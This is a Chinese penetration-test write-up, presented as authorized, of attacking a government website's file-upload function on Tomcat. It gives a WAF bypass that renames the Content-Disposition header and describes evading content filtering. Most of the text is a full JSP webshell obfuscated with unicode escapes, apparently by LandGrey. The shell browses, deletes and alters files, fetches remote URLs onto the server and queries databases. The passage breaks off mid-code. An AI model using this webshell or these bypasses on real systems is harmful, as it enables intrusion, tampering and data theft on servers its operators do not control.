一次授权渗透实战

前言

很久没有整理实战文章了，恰好这周项目上有一个目标折腾两天时间，记录分享下其中的心路历程。（本次渗透过程均在目标授权下进行，请勿进行非法渗透行为。）

目标基本信息

某政务网站
服务器--windows
数据库--未知
中间件--Tomcat
开发语言--java
未使用CDN
存在waf--种类未知

Getshell过程

目标存在一处上传功能。

image.png

上传成功后返回取件码。

使用取件码进行信件查询。

点击附件为下载链接。

image.png

对下载链接进行测试，发现报错时泄漏了绝对路径。

进过几次尝试，成功访问到上传的图片。

继续对上传功能进行测试，waf对上传后缀名进行了白名单限制，未发现可以利用的后缀名。
根据以往的bypass经验，开始手撕waf。

后缀名校验绕过

经过尝试，当Content-Disposition字段修改为Content+Disposition时可以绕过waf。

内容校验绕过

直接上传免杀较强的冰蝎马。

未上传成功，看来存在文件内容校验，拿出自己的免杀马进行测试。
经过尝试免杀马全部阵亡，无一例外。
敲个helloword看看吧。
然而。。。

第一次碰到连helloword都拦的waf。
经过多次测试，waf对绝大部分的jsp函数都进行了拦截。

内容加密

首先想到的解决方案是对木马进行加密。
在网上查找相关的资料，发现LandGrey大佬的一个unicode编码的木马。传送门

<%@page import="java.io.*,java.net.*,java.sql.*,java.text.*"%>
<%!
\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0050\u0077\u0064\u003d\u0022\u004c\u0061\u006e\u0064\u0047\u0072\u0065\u0079\u0022\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0045\u0043\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0073\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0022\u0049\u0053\u004f\u002d\u0038\u0038\u0035\u0039\u002d\u0031\u0022\u0029\u002c\u0063\u0029\u003b\u007d\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0047\u0043\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0078\u003d\u0073\u002e\u0074\u0072\u0069\u006d\u0028\u0029\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0078\u005b\u0030\u005d\u002e\u0074\u0072\u0069\u006d\u0028\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0063\u003d\u0044\u0072\u0069\u0076\u0065\u0072\u004d\u0061\u006e\u0061\u0067\u0065\u0072\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0028\u0078\u005b\u0031\u005d\u002e\u0074\u0072\u0069\u006d\u0028\u0029\u0029\u003b\u0069\u0066\u0028\u0078\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003e\u0032\u0029\u007b\u0063\u002e\u0073\u0065\u0074\u0043\u0061\u0074\u0061\u006c\u006f\u0067\u0028\u0078\u005b\u0032\u005d\u002e\u0074\u0072\u0069\u006d\u0028\u0029\u0029\u003b\u007d\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0041\u0041\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0072\u005b\u005d\u003d\u0046\u0069\u006c\u0065\u002e\u006c\u0069\u0073\u0074\u0052\u006f\u006f\u0074\u0073\u0028\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u0069\u003d\u0030\u003b\u0069\u003c\u0072\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0069\u002b\u002b\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0072\u005b\u0069\u005d\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u0032\u0029\u0029\u003b\u007d\u007d\u0076\u006f\u0069\u0064\u0020\u0042\u0042\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u006f\u0046\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u002c\u006c\u005b\u005d\u003d\u006f\u0046\u002e\u006c\u0069\u0073\u0074\u0046\u0069\u006c\u0065\u0073\u0028\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0054\u002c\u0020\u0073\u0051\u002c\u0073\u0046\u003d\u0022\u0022\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0044\u0061\u0074\u0065\u0020\u0064\u0074\u003b\u0053\u0069\u006d\u0070\u006c\u0065\u0044\u0061\u0074\u0065\u0046\u006f\u0072\u006d\u0061\u0074\u0020\u0066\u006d\u003d\u006e\u0065\u0077\u0020\u0053\u0069\u006d\u0070\u006c\u0065\u0044\u0061\u0074\u0065\u0046\u006f\u0072\u006d\u0061\u0074\u0028\u0022\u0079\u0079\u0079\u0079\u002d\u004d\u004d\u002d\u0064\u0064\u0020\u0048\u0048\u003a\u006d\u006d\u003a\u0073\u0073\u0022\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u0069\u003d\u0030\u003b\u0069\u003c\u006c\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0069\u002b\u002b\u0029\u007b\u0064\u0074\u003d\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0044\u0061\u0074\u0065\u0028\u006c\u005b\u0069\u005d\u002e\u006c\u0061\u0073\u0074\u004d\u006f\u0064\u0069\u0066\u0069\u0065\u0064\u0028\u0029\u0029\u003b\u0073\u0054\u003d\u0066\u006d\u002e\u0066\u006f\u0072\u006d\u0061\u0074\u0028\u0064\u0074\u0029\u003b\u0073\u0051\u003d\u006c\u005b\u0069\u005d\u002e\u0063\u0061\u006e\u0052\u0065\u0061\u0064\u0028\u0029\u003f\u0022\u0052\u0022\u003a\u0022\u0022\u003b\u0073\u0051\u002b\u003d\u006c\u005b\u0069\u005d\u002e\u0063\u0061\u006e\u0057\u0072\u0069\u0074\u0065\u0028\u0029\u003f\u0022\u0020\u0057\u0022\u003a\u0022\u0022\u003b\u0069\u0066\u0028\u006c\u005b\u0069\u005d\u002e\u0069\u0073\u0044\u0069\u0072\u0065\u0063\u0074\u006f\u0072\u0079\u0028\u0029\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u006c\u005b\u0069\u005d\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u002b\u0022\u002f\u005c\u0074\u0022\u002b\u0073\u0054\u002b\u0022\u005c\u0074\u0022\u002b\u006c\u005b\u0069\u005d\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0028\u0029\u002b\u0022\u005c\u0074\u0022\u002b\u0073\u0051\u002b\u0022\u005c\u006e\u0022\u0029\u003b\u007d\u0065\u006c\u0073\u0065\u007b\u0073\u0046\u002b\u003d\u006c\u005b\u0069\u005d\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u002b\u0022\u005c\u0074\u0022\u002b\u0073\u0054\u002b\u0022\u005c\u0074\u0022\u002b\u006c\u005b\u0069\u005d\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0028\u0029\u002b\u0022\u005c\u0074\u0022\u002b\u0073\u0051\u002b\u0022\u005c\u006e\u0022\u003b\u007d\u007d\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0073\u0046\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0045\u0045\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u003b\u0069\u0066\u0028\u0066\u002e\u0069\u0073\u0044\u0069\u0072\u0065\u0063\u0074\u006f\u0072\u0079\u0028\u0029\u0029\u007b\u0046\u0069\u006c\u0065\u0020\u0078\u005b\u005d\u003d\u0066\u002e\u006c\u0069\u0073\u0074\u0046\u0069\u006c\u0065\u0073\u0028\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u006b\u003d\u0030\u003b\u006b\u003c\u0078\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u006b\u002b\u002b\u0029\u007b\u0069\u0066\u0028\u0021\u0078\u005b\u006b\u005d\u002e\u0064\u0065\u006c\u0065\u0074\u0065\u0028\u0029\u0029\u007b\u0045\u0045\u0028\u0078\u005b\u006b\u005d\u002e\u0067\u0065\u0074\u0050\u0061\u0074\u0068\u0028\u0029\u0029\u003b\u007d\u007d\u007d\u0066\u002e\u0064\u0065\u006c\u0065\u0074\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0046\u0046\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0048\u0074\u0074\u0070\u0053\u0065\u0072\u0076\u006c\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0020\u0072\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0069\u006e\u0074\u0020\u006e\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0062\u003d\u006e\u0065\u0077\u0020\u0062\u0079\u0074\u0065\u005b\u0035\u0031\u0032\u005d\u003b\u0072\u002e\u0072\u0065\u0073\u0065\u0074\u0028\u0029\u003b\u0053\u0065\u0072\u0076\u006c\u0065\u0074\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u006f\u0073\u003d\u0072\u002e\u0067\u0065\u0074\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u0073\u003d\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0073\u0029\u0029\u003b\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0028\u0022\u0058\u0040\u0059\u0022\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u0030\u002c\u0033\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006e\u003d\u0069\u0073\u002e\u0072\u0065\u0061\u0064\u0028\u0062\u002c\u0030\u002c\u0035\u0031\u0032\u0029\u0029\u0021\u003d\u002d\u0031\u0029\u007b\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0062\u002c\u0030\u002c\u006e\u0029\u003b\u007d\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0028\u0022\u0058\u0040\u0059\u0022\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u0030\u002c\u0033\u0029\u003b\u006f\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0069\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0047\u0047\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0064\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0068\u003d\u0022\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0041\u0042\u0043\u0044\u0045\u0046\u0022\u003b\u0069\u006e\u0074\u0020\u006e\u003b\u0046\u0069\u006c\u0065\u0020\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u003b\u0066\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u004e\u0065\u0077\u0046\u0069\u006c\u0065\u0028\u0029\u003b\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u006f\u0073\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0066\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u0069\u003d\u0030\u003b\u0069\u003c\u0064\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0028\u0029\u003b\u0069\u002b\u003d\u0032\u0029\u007b\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0028\u0068\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0064\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0069\u0029\u0029\u003c\u003c\u0034\u007c\u0068\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0064\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0069\u002b\u0031\u0029\u0029\u0029\u0029\u003b\u007d\u006f\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0048\u0048\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0064\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0073\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u002c\u0064\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0064\u0029\u003b\u0069\u0066\u0028\u0073\u0066\u002e\u0069\u0073\u0044\u0069\u0072\u0065\u0063\u0074\u006f\u0072\u0079\u0028\u0029\u0029\u007b\u0069\u0066\u0028\u0021\u0064\u0066\u002e\u0065\u0078\u0069\u0073\u0074\u0073\u0028\u0029\u0029\u007b\u0064\u0066\u002e\u006d\u006b\u0064\u0069\u0072\u0028\u0029\u003b\u007d\u0046\u0069\u006c\u0065\u0020\u007a\u005b\u005d\u003d\u0073\u0066\u002e\u006c\u0069\u0073\u0074\u0046\u0069\u006c\u0065\u0073\u0028\u0029\u003b\u0066\u006f\u0072\u0028\u0069\u006e\u0074\u0020\u006a\u003d\u0030\u003b\u006a\u003c\u007a\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u006a\u002b\u002b\u0029\u007b\u0048\u0048\u0028\u0073\u002b\u0022\u002f\u0022\u002b\u007a\u005b\u006a\u005d\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u002c\u0064\u002b\u0022\u002f\u0022\u002b\u007a\u005b\u006a\u005d\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u0029\u003b\u007d\u007d\u0065\u006c\u0073\u0065\u007b\u0046\u0069\u006c\u0065\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u0073\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0073\u0066\u0029\u003b\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u006f\u0073\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0064\u0066\u0029\u003b\u0069\u006e\u0074\u0020\u006e\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0062\u003d\u006e\u0065\u0077\u0020\u0062\u0079\u0074\u0065\u005b\u0035\u0031\u0032\u005d\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006e\u003d\u0069\u0073\u002e\u0072\u0065\u0061\u0064\u0028\u0062\u002c\u0030\u002c\u0035\u0031\u0032\u0029\u0029\u0021\u003d\u002d\u0031\u0029\u007b\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0062\u002c\u0030\u002c\u006e\u0029\u003b\u007d\u0069\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u006f\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u007d\u0076\u006f\u0069\u0064\u0020\u0049\u0049\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0064\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0073\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u002c\u0064\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0064\u0029\u003b\u0073\u0066\u002e\u0072\u0065\u006e\u0061\u006d\u0065\u0054\u006f\u0028\u0064\u0066\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u004a\u004a\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u003b\u0066\u002e\u006d\u006b\u0064\u0069\u0072\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u004b\u004b\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0074\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0046\u0069\u006c\u0065\u0020\u0066\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u0028\u0073\u0029\u003b\u0053\u0069\u006d\u0070\u006c\u0065\u0044\u0061\u0074\u0065\u0046\u006f\u0072\u006d\u0061\u0074\u0020\u0066\u006d\u003d\u006e\u0065\u0077\u0020\u0053\u0069\u006d\u0070\u006c\u0065\u0044\u0061\u0074\u0065\u0046\u006f\u0072\u006d\u0061\u0074\u0028\u0022\u0079\u0079\u0079\u0079\u002d\u004d\u004d\u002d\u0064\u0064\u0020\u0048\u0048\u003a\u006d\u006d\u003a\u0073\u0073\u0022\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0044\u0061\u0074\u0065\u0020\u0064\u0074\u003d\u0066\u006d\u002e\u0070\u0061\u0072\u0073\u0065\u0028\u0074\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u004c\u0061\u0073\u0074\u004d\u006f\u0064\u0069\u0066\u0069\u0065\u0064\u0028\u0064\u0074\u002e\u0067\u0065\u0074\u0054\u0069\u006d\u0065\u0028\u0029\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u004c\u004c\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0064\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0055\u0052\u004c\u0020\u0075\u003d\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0028\u0073\u0029\u003b\u0069\u006e\u0074\u0020\u006e\u003b\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u006f\u0073\u003d\u006e\u0065\u0077\u0020\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0064\u0029\u003b\u0048\u0074\u0074\u0070\u0055\u0052\u004c\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0068\u003d\u0028\u0048\u0074\u0074\u0070\u0055\u0052\u004c\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0029\u0075\u002e\u006f\u0070\u0065\u006e\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u003b\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u0073\u003d\u0068\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0062\u003d\u006e\u0065\u0077\u0020\u0062\u0079\u0074\u0065\u005b\u0035\u0031\u0032\u005d\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006e\u003d\u0069\u0073\u002e\u0072\u0065\u0061\u0064\u0028\u0062\u002c\u0030\u002c\u0035\u0031\u0032\u0029\u0029\u0021\u003d\u002d\u0031\u0029\u007b\u006f\u0073\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0062\u002c\u0030\u002c\u006e\u0029\u003b\u007d\u006f\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0069\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0068\u002e\u0064\u0069\u0073\u0063\u006f\u006e\u006e\u0065\u0063\u0074\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u004d\u004d\u0028\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u0073\u002c\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006c\u003b\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0072\u003d\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0069\u0073\u0029\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006c\u003d\u0062\u0072\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0021\u003d\u006e\u0075\u006c\u006c\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u006c\u002b\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u007d\u007d\u0076\u006f\u0069\u0064\u0020\u004e\u004e\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0063\u003d\u0047\u0043\u0028\u0073\u0029\u003b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u0020\u0072\u003d\u0063\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0028\u0029\u002e\u0067\u0065\u0074\u0043\u0061\u0074\u0061\u006c\u006f\u0067\u0073\u0028\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0072\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0072\u002e\u0067\u0065\u0074\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0029\u002b\u0022\u005c\u0074\u0022\u0029\u003b\u007d\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0063\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u004f\u004f\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0063\u003d\u0047\u0043\u0028\u0073\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0074\u003d\u007b\u0022\u0054\u0041\u0042\u004c\u0045\u0022\u007d\u003b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u0020\u0072\u003d\u0063\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0061\u0044\u0061\u0074\u0061\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0061\u0062\u006c\u0065\u0073\u0020\u0028\u006e\u0075\u006c\u006c\u002c\u006e\u0075\u006c\u006c\u002c\u0022\u0025\u0022\u002c\u0074\u0029\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0072\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u0029\u007b\u0073\u0062\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0072\u002e\u0067\u0065\u0074\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0022\u0054\u0041\u0042\u004c\u0045\u005f\u004e\u0041\u004d\u0045\u0022\u0029\u002b\u0022\u005c\u0074\u0022\u0029\u003b\u007d\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u0063\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b\u007d\u0076\u006f\u0069\u0064\u0020\u0050\u0050\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u0073\u0062\u0029\u0074\u0068\u0072\u006f\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0078\u003d\u0073\u002e\u0074\u0072\u0069\u006d\u0028\u0029\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0022\u005c\u0072\u005c\u006e\u0022\u0029\u003b\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0020\u0063\u003d\u0047\u0043\u0028\u0073\u0029\u003b\u0053\u0074\u0061\u0074\u0065\u006d\u0065\u006e\u0074\u0020\u006d\u003d\u0063\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0053\u0074\u0061\u0074\u0065\u006d\u0065\u006e\u0074\u0028\u0031\u0030\u0030\u0035\u002c\u0031\u0030\u0030\u0037\u0029\u003b\u0052\u0065\u0073\u0075\u006c\u0074\u0053\u0065\u0074\u0020\